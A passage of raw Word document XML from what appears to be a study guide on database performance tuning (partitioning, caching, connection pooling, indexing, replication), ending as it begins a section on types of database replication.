      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Denormalize for Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In some cases, denormalization (introducing redundancy) can improve performance by reducing the need for complex joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE9092" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Partition large tables into smaller, more manageable pieces based on a key, like date or geographic region. This reduces the amount of data the database needs to scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D2AB9"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4. Efficient Data Modeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCD473" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Choose the Right Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use the smallest possible data types for your columns to save space and improve performance. For example, use TINYINT instead of INT if the values will be small.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF0011" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Constraints and Foreign Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enforce data integrity with constraints and foreign keys, but balance this with the performance impact they may have on insert and update operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2602B"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5. Connection and Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07204337" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use connection pooling to reuse existing connections rather than creating new ones for each request. This reduces overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF568A" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Manage Transactions Wisely</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Keep transactions as short as possible to avoid locking resources for long periods. Use the appropriate isolation level based on your consistency and performance needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667E9DC" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Batch Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Batch multiple inserts, updates, or deletes into a single query instead of executing them one by one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B839556"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6. Caching Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204B3D2" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use In-Memory Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement caching layers like Redis or Memcached to store frequently accessed data in memory, reducing the load on the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1973663E" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cache Expensive Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Store the results of complex queries that don’t change often in a cache to reduce database load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B262206"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7. Hardware and Resource Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F447A7" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimize Disk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use SSDs instead of HDDs for faster read/write operations. Ensure that the database’s storage subsystem is optimized for the workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D94BB" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allocate Sufficient Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure the database has enough RAM to store the working set of frequently accessed data. Increase the buffer cache size to reduce disk I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF9337" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor and Tune CPU Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that CPU resources are not being over-utilized. Tune database settings and queries to avoid CPU bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF7CA6"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8. Regular Database Maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DB3B7" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rebuild Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly rebuild or reorganize indexes to remove fragmentation and improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A342AEE" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Update Statistics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that database statistics are up to date so that the query optimizer can make accurate decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5FAFD2" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Perform Regular Backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regular backups ensure data safety and can also help in reducing the load on the database by removing old logs or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8F072"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9. Monitoring and Profiling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D0121" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Performance Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Tools like New Relic, Datadog, or native database monitoring tools help track query performance, slow queries, and resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31014646" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Profile Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Identify and optimize slow queries using database profiling tools. Focus on high-impact queries that consume the most resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1CBDD" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. Load Balancing and Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26AE5C" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>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 Distribute database queries across multiple servers to balance the load and prevent bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FBC76D" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use replication to create read replicas of your database. Direct read-heavy operations to these replicas, reducing the load on the primary database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75241E6D" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8C67A2" w14:textId="05B02759" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc178383307"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is database replication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="44BA6585" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process of copying and maintaining database objects, such as tables, in multiple databases that are part of a distributed database system. The goal of replication is to ensure that data is consistently available across different locations, improve read performance, and provide fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD572DD" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Database Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A45011" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Synchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA07676"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In synchronous replication, data is simultaneously written to both the primary and replica databases. The primary database waits for confirmation from the replica that the data has been written before committing the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED8859"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures data consistency and is typically used in environments where data accuracy and integrity are critical, such as financial systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B94A55C"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lastRenderedPageBreak/>
        <w:t>Drawback</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Higher latency due to the need to wait for confirmation from all replicas before completing a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20988AF9" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
